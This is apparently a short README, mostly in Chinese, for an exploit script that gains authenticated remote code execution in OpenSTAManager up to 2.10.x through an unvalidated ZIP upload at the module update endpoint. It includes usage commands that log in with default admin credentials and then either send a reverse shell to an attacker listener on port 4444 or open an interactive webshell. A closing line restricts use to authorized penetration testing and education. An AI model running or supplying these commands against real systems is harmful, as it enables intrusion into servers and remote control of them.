通过模块更新端点的未验证ZIP上传实现经过身份验证的远程代码执行。
受影响版本: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
仅用于授权的渗透测试和教育目的。